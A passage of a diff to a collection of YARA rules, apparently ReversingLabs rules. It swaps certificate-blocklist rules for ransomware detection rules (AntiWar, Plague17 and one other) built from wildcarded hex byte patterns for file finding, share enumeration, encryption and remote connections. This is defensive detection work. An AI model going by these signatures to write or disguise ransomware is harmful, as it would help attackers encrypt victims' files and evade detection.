?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? + ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? + ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 + 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 + ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? + 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ?? + ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA + ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ?? + ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 + } + $remote_ftp_connection = { + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 + 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? + ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9 + ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80 + ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 + ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8 + ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83 + ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 + ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B + 45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88 + ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 + FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? + 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? + ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? + 8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 + ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? + B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? + ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D + 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 + ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? + ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? + 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures[i].serial=="fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57") and 1287360000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects AntiWar ransomware." author = "ReversingLabs" - id = "d2c87c29-cb64-5d43-847b-64c888421c1f" - date = "2023-11-08" - modified = "2023-11-08" + id = "3113ec26-e149-527b-9478-4dd86c7fa464" + date = "2022-04-21" + modified = "2022-04-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2376-L2392" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "AntiWar" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? + 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ?? + 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F + E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? + F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 + 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D + 3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 + 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33 + C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66 + 66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3 + } + $find_files_p2 = { + E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83 + C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC + 4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ?? + ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ?? + 48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE + ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? + 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF + 90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C + ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ?? + ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D + 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 + 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D + } + $find_files_p3 = { + 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? + ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? + ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43 + 8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72 + ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA + ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? + ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ?? + 48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B + } + $find_files_p4 = { + 48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ?? + 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? + 72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? + 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF + 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D + ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ?? + ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ?? + ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 + 33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0 + } + $enum_shares = { + 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ?? + ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 + ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? + 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 + 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 + ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? + 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C + 8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ?? + ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? + ?? 48 83 C4 ?? C3 + } + $encrypt_files_p1 = { + 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA + ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 + 8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ?? + ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 + A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85 + ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? + ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D + 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? + ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? + ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 + } + $encrypt_files_p2 = { + 8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74 + 24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? + ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ?? + ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? + 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ?? + ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B + 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? + ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ?? + ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B + 0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? + ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shenzhen Hua\\xE2\\x80\\x99nan Xingfa Electronic Equipment Firm" and pe.signatures[i].serial=="1c:b2:d5:23:a6:bf:7a:06:66:42:c5:78:de:1c:9b:e4" and 1400889599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($enum_shares)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3A6Ccabb1C62F3Be3Eb03869Fa43Dc4A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Plague17 ransomware." author = "ReversingLabs" - id = "b16f7bb7-88fe-5f8f-9592-8d309f556419" - date = "2023-11-08" - modified = "2023-11-08" + id = "065c47b5-f459-529e-8046-7394a742b50a" + date = "2021-02-19" + modified = "2021-02-19" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2394-L2410" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ccb603c8a5f4fb63876e78d763f80a97098c23aa10673c7b04a48026268f57d3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Plague17" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89 + 85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B + 00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? + ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44 + 24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83 + EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F + 87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D + } + $find_files_p2 = { + 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ?? + ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24 + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ?? + ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ?? + ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? + ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ?? + ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? + ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 